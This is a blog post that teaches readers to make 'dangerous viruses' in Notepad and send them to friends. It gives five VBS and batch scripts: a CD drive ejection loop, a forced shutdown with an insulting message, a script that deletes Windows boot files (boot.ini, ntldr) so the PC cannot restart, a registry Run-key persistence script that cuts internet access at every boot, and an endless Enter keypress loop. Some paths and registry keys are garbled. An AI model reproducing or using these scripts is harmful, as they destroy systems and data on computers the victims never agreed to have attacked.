how to make a dangerous virus

how to make a dangerous virus

 the virus is a big thread for computer or mobile, it can crash all your data even your devices.
so today I will show you how you can make a dangerous virus,
it's very easy. you can make all of these in notepad.

how to make a dangerous virus


1:  Continually pop out your friend's CD Drive.

write your code in notepad and save it with the .vbs extension.


 Set oWMP = CreateObject("WMPlayer.OCX.7")

 Set colCDROMs = oWMP.cdromCollection 
do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject 
Next
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 5000
 loop

Save it as "Anything.VBS" and send it to your friend, it will continually pop out your friend's cd rom.

2: send your friend a little message and shut down his / her computer:


this virus will show a message on your friend's computer screen and shut down his/her computer.
type this code in notepad and save it as a .bat file.

Code: @echo off
 msg * I don't like you
 shutdown -c "Error! You are too stupid!" -s



save it name.bat
it will shut down your friend's computer.

3: Virus that crashes pc

 @echo off
attrib -r -s -h c:autoexec.bat
 del c:autoexec.bat
 attrib -r -s -h c:boot.ini
 del c:boot.ini
 attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
 del c:windowswin.ini
 @echo off msg * YOU ARE CRASHED!!!
 shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!! This Will Pop Up A Message Saying "you are crashed!!! And Shut Down The Computer Never To Reboot Again!
because this virus will delete your window or OS.

4: Disable Internet Permanently 

open note pad and write the following code and save it as anything.bat.
it will disable internet permanently till you update your window.

echo @echo off>c:windowswimn32.bat
 echo break off>>c:windowswimn32.bat
 echo ipconfig/release_all>>c:windowswimn32.bat
 echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d
 c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d
 c:windowswimn32.bat /f
 echo You Have Been HACKED! PAUSE


Save As A Batch File. it will pop a message and disable the internet.


5: Frustrate your friend by hitting  Enter key simultaneously:

this will continually hit your friend's computer enter key.

Set wshShell = wscript.CreateObject("WScript.Shell ")
do
  wscript.sleep 100
  wshshell.sendkeys "~(enter)"
 loop


 Save it as "Anything.VBS".


note: don't try it at your own computer


Share:

1 comment:

  1. Nice blog.
    Please don't create virus that will destroy the word... 😂
    I deal on SEO and business ideas
    www.ozlinking.com

    ReplyDelete

Featured Post

Blog Archive